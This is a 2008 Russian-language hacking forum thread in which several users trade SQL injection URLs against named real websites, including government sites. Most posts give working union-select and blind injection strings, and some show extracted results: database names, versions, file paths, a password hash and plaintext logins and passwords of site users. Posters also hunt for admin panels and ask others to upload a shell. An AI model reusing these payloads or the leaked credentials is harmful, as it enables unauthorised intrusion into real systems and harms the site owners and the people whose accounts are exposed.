11.08.2008, 14:52
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами:
9725544
Репутация:
246
|
|
http://www.avtobamper.ru/item_view.php?id=49&item_id=-1+union+select+1,2,3,Version(),5,user(),7,database (),9,10,11,12,13/*
Можно чёнють седлать? Пытался нече неполучилось 
Вот ещё немагу найти админку, все нашол а админку нет 
http://www.good-food.ru/
Последний раз редактировалось S0ulVortex; 11.08.2008 в 15:16..
|
|
|
11.08.2008, 16:34
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://hutro.com/index.php?pageid=15+union+select+1,2,concat_ws(0x3 a,user(),database(),version()),4,5,6,7,8,9,10,11,1 2--
hutro_hutro@localhost:hutro_hutro:4.1.22-standard-log
http://hutro.com/index.php?pageid=15+union+select+1,2,table_name,4, 5,6,7,8,9,10,11,12+from+information_schema.tables+ limit+0,1--
выдает:
Код:
SELECT * FROM aadm_menu WHERE id=15 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 0,1--: SELECT command denied to user 'hutro_hutro'@'localhost' for table 'tables'
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/hutro/public_html/index.php on line 86
|
|
|
|
11.08.2008, 17:08
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19--
http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(ver sion(),1,1)))=52--
version() = 4.*.*.*
edited:
http://www.amanda-nylons.com/index.php?pageID='
странно как-то -) order+by говорит что 1 колонка, а union+select+1 никак вообще. мож кто разберется.
Последний раз редактировалось Calcutta; 11.08.2008 в 18:51..
|
|
|
|
11.08.2008, 17:36
|
|
Познающий
Регистрация: 24.07.2007
Сообщений: 31
С нами:
9895235
Репутация:
35
|
|
Сообщение от Calcutta
вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19--
http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(ver sion(),1,1)))=52--
version() = 4.*.*.*
http://biomac.ru/index.php?pageid=-117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19--
|
|
|
|
11.08.2008, 18:15
|
|
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
С нами:
10628635
Репутация:
78
|
|
Сайт: www.blackratpress.co.uk PR=5
http://www.blackratpress.co.uk/event.php?id=9+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7+from+admin_login+limit+2,1/*
Админка:
http://www.blackratpress.co.uk/admin/
Логин и пароль админа:
Пытался залить шелл, ничего не получлось, у кого получится отпостите...
|
|
|
|
11.08.2008, 19:31
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
http://www.aliyahjobcenter.org/page.php?id=50[SQL]
DBname: israemploy
User: israemploy@localhost
Version: 5.0.45-log
user
id:login  assword:userType ermissionLevel
1:yisrael:w3X-5j4Q:Programmer:3
2:danbarry:P*4t7r9~a$:Programmer:3
3:isaac:issac:Programmer:3
4:macron:n<5f3r8&K+:Regular:3
5:lubrob:w$2u5m9#G*:Regular:3
8:test:test:Regular:3 админку не нашол(( кто найдет - в личку плз.
|
|
|
|
11.08.2008, 19:40
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,concat_ws(0x3a,user(),v ersion(),database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57--
crimeahouseru@localhost:5.0.26-log:dbm_www_crimeahouse_ru
http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,mail,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57+from+mail+limit+72 3,1--
мыльники - самое интересное, что можно вытащить, кажется >_>
________________
http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,2,3,4,5
http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,table_name,3,4,5+from+informati on_schema.tables+limit+0,1--
Код:
SELECT * FROM faq WHERE id_faq=-155 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--
Error: SELECT command denied to user 'makcm'@'localhost' for table 'tables'
К сожалению, сервис Вопрос-Ответ недоступен
Последний раз редактировалось Calcutta; 11.08.2008 в 20:19..
|
|
|
|
11.08.2008, 20:25
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами:
9847919
Репутация:
1446
|
|
fabbrigroup.com
Код:
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+concat(0x3,version())/*
5.0.45�fabbrigroup_com@localhost�fabbrigroup_com
Код:
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+password+from+fabbrigroup_users+limit+0,1/*
admin:aec5dd86377b6754b9509a775a0e2a26:ruotino
|
|
|
|
11.08.2008, 21:36
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами:
9367310
Репутация:
52
|
|
http://www.realestate.com.pr
5 ветка
http://www.realestate.com.pr/sale/?pueblo=52+and+5=substring((version()),1,1)&town=M orovis&state=Puerto%20Rico
админку не нашел..
http://www.pumpi.com.mk
version = 4
http://www.pumpi.com.mk/NewsSingle.php?id=-5+union+select+1,version()
forbidden http://www.pumpi.com.mk/admin/
http://www.pumpi.com.mk
version = 4
http://www.sankeram.com.mk/content.php?id=11+and+4=substring(version(),1,1)
http://www.nibm.com.mk
4 ветка
http://www.nibm.com.mk/content.php?id=23+and+4=substring((version()),1,1)
админка
http://www.sport.gov.mo
4 version
есть табличка users c полями username,password
http://www.sport.gov.mo/web/pt/aviso/details.php?id=-1331+union+select+1,concat_ws(0x3a3a3a,username,pa ssword),3,4+from+users+limit+0,1/*
username = cat
password = catch
только вот не подходят они...(
http://www.uni-care.com.mo
5 ветка
http://www.uni-care.com.mo/info_detail.php?id=-9+union+select+1,version(),3,4,5/*
директория C:\Inetpub\vhosts\uni-care.com.mo\httpdocs\info_detail.php
http://www.cpttm.org.mo
4 ветка
http://www.cpttm.org.mo/news_e.php?id=-56+union+select+1,2,3,4,5,unhex(hex(version())),7, 8,9,10,11,12,13,14,15,16/*
директория D:\wwwroot2\news.php
http://www.lev.me
version() = 4.0.27-max-log
http://www.lev.me/comments.php?id=-84+union+select+1,2,3,4,version(),6,7/*
Последний раз редактировалось MirA; 12.08.2008 в 03:04..
|
|
|
|
12.08.2008, 12:43
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
http://www.congress.gov.ph/press/details.php?pressid=-2528
1,2,3,4,5,6,7,8
User:congres_egovern@pregi-web.pregi.net
Database:congres_hrep
Version:4.0.24_Debian-10sarge2-log
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
